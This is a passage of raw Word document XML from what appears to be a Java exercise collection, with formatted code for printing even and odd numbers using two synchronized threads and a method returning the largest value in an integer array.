          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Print even and odd numbers using thread</w:t>
      </w:r>
      <w:bookmarkEnd w:id="311"/>
    </w:p>
    <w:p w14:paraId="16DA8469" w14:textId="3A6EB9C3" w:rsidR="00B72394" w:rsidRPr="00CE4B95" w:rsidRDefault="00B72394">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4136123B"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NumberPrint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26638E0"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umb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36A0C23E"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max</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50488855"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Objec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lock</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Object</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09A30D7C"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4F48F10A"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NumberPrinter</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ma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C53DFCE"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max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ax</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78BDAD23"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FA8069C"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0C1261EC"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printOd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84346A5"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ynchronize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loc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7F9EC5B"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whi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umber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ma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9ED0C51"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umb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5FE4E2D"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Odd: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ber</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7809EA83"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number</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F769F73"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loc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otify</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CFBBFE"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ls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06BE879"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y</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6C244B2"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loc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wait</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D2393C"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atch</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InterruptedException</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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CEA5ABB"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urrentThrea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terrupt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75A7B104"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D3ED4AC"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E71ABD1"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9D948E4"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FCE361B"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4FE9D80"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56ECFC5C"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printEve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C9A2C7D"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ynchronize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loc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1A993CD"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whi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umber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ma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197D187"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umb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84DE868"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Even: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ber</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FD9B8BF"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number</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9149F4"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loc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otify</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CF1C4A"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ls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27D0617"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y</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15F9DEF"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loc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wait</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C3AC427"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atch</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InterruptedException</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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583B5FA"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urrentThrea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terrupt</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E91F4B"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2627A87"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70377AB"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B12A0CE"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4AFD5D4"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8AAFB70"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227CADDD"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2426B747"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venOddThrea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C51D6E9"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AAEAAB8"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NumberPrinter</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> print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NumberPrinter</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hange max here</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D83B45"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0766AB86"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> oddThrea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Odd</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08CEE4E9"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> evenThrea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rea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Even</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04307F16"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53882A8F"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oddThrea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art</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D5994D"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evenThrea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art</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0266E14A" w14:textId="77777777"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F319686" w14:textId="51FFCCE6" w:rsidR="000429F7" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E658B2" w14:textId="404DA01B" w:rsidR="00D74910" w:rsidRPr="00CE4B95" w:rsidRDefault="00D74910">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="312" w:name="_Toc196307792"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00304887" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Find maximum value from integer array</w:t>
      </w:r>
      <w:bookmarkEnd w:id="312"/>
    </w:p>
    <w:p w14:paraId="373A6AA8" w14:textId="571A7C6E" w:rsidR="00F66346" w:rsidRPr="00CE4B95" w:rsidRDefault="00F66346" w:rsidP="00F66346">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a method to return the maximum value from an integer array passed as an input parameter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F603C6C" w14:textId="3D05FC62" w:rsidR="00D74910" w:rsidRPr="00CE4B95" w:rsidRDefault="00D74910">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4161A9DE" w14:textId="77777777" w:rsidR="00F66346" w:rsidRPr="00CE4B95"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indLargestNumber</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ABE8DAD" w14:textId="77777777" w:rsidR="00F66346" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B4E127E" w14:textId="71548D8D" w:rsidR="00F66346" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>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returnLargetNumber</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p>
    <w:p w14:paraId="5D285426" w14:textId="53C7443F" w:rsidR="00F66346" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F31109D" w14:textId="620875B0" w:rsidR="00F66346" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>in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p>
    <w:p w14:paraId="48575CEF" w14:textId="50EA47AA" w:rsidR="00F66346" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>int</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> largestNumb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5A950714" w14:textId="22CC8214" w:rsidR="00F66346" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>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p>
    <w:p w14:paraId="223D6455" w14:textId="71439FB4" w:rsidR="00F66346" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>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largestNumber</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="00A70B1A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283ED118" w14:textId="06277F34" w:rsidR="00F66346" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">largestNumb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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE852C0" w14:textId="5FD05EB1" w:rsidR="00F66346" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>return</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> largestNumber</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BB38BC" w14:textId="072370C4" w:rsidR="00F66346" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747C6BD8" w14:textId="75A9BB2F" w:rsidR="00F66346" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>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p>
    <w:p w14:paraId="64423EB8" w14:textId="0B7EEBD2" w:rsidR="00F66346" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6CFF6B" w14:textId="16366477" w:rsidR="00F66346" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000088"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>in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5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786</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98</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8F9F42" w14:textId="356775DA" w:rsidR="00F66346" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>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Largest number in given array :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eturnLargetNumb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rr</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDD9CB1" w14:textId="5D210A87" w:rsidR="00F66346" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6719DD4C" w14:textId="5C6EC061" w:rsidR="00F66346" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDB25B3" w14:textId="77777777" w:rsidR="00022774" w:rsidRPr="00CE4B95" w:rsidRDefault="00022774">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C34FAA4" w14:textId="55B2B7E1" w:rsidR="00E56884" w:rsidRPr="00CE4B95" w:rsidRDefault="00E56884">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="313" w:name="_Toc196307793"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="0093488A" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
